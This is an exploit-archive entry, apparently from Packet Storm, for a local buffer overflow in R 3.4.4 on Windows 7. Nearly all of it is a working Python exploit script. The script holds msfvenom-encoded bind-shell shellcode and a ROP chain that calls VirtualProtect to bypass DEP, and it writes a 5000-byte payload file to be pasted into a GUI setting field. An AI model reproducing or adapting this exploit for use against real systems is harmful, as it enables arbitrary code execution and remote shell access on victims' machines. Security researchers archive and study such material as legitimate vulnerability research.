R 3.4.4 Local Buffer Overflow

2018-05-22T00:00:00
ID PACKETSTORM:147807
Type packetstorm
Reporter Hashim Jawad
Modified 2018-05-22T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#################################################################################################################  
# Exploit Title : R v3.4.4 - Local Buffer Overflow (DEP Bypass) #  
# Exploit Author : Hashim Jawad #  
# Twitter : @ihack4falafel #   
# Author Website : ihack4falafel[.]com #  
# Vendor Homepage : https://www.r-project.org/ #  
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe #  
# Tested on OS : Microsoft Windows 7 Enterprise - SP1 (x86) #  
# Steps to reproduce : under GUI preferences, paste payload.txt contents into 'Language for menus and messages' #  
#################################################################################################################  
  
# Credit to bzyo for finding the bug (44516)  
  
import struct  
  
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode  
#Payload size: 718 bytes  
shellcode = ""  
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"  
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"  
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"  
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"  
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"  
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"  
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"  
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"  
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"  
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"  
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"  
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"  
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"  
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"  
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"  
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"  
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"  
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"  
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"  
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"  
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"  
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"  
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"  
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"  
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"  
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"  
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"  
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"  
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"  
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"  
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"  
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"  
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"  
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"  
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"  
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"  
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"  
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"  
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"  
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"  
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"  
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"  
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"  
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"  
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"  
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"  
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"  
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"  
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"  
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"  
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"  
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"  
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"  
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"  
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"  
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"  
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"  
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"  
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"  
  
'''  
Output generated by mona.py v2.0, rev 582 - Immunity Debugger  
--------------------------------------------  
Register setup for VirtualProtect() :  
--------------------------------------------  
EAX = NOP (0x90909090)  
ECX = lpOldProtect (ptr to W address)  
EDX = NewProtect (0x40)  
EBX = dwSize  
ESP = lPAddress (automatic)  
EBP = ReturnTo (ptr to jmp esp)  
ESI = ptr to VirtualProtect()  
EDI = ROP NOP (RETN)  
--------------------------------------------  
'''  
  
rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]   
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]  
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]   
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]   
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]   
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]  
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]   
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501  
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]   
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]   
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]   
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040  
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]   
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]   
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]   
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]  
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]   
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]  
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]   
rop += struct.pack('<L', 0x90909090) # nop  
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]   
  
buffer = '\x41' * 292 # filler to EIP  
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]  
buffer += '\x41' * 4 # compensate for pop esi  
buffer += rop  
buffer += '\x90' * 50  
buffer += shellcode  
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))  
  
try:  
f=open('payload.txt','w')  
print '[+] Creating %s bytes evil payload..' %len(buffer)  
f.write(buffer)  
f.close()  
print '[+] File created!'  
except Exception as e:  
print e  
`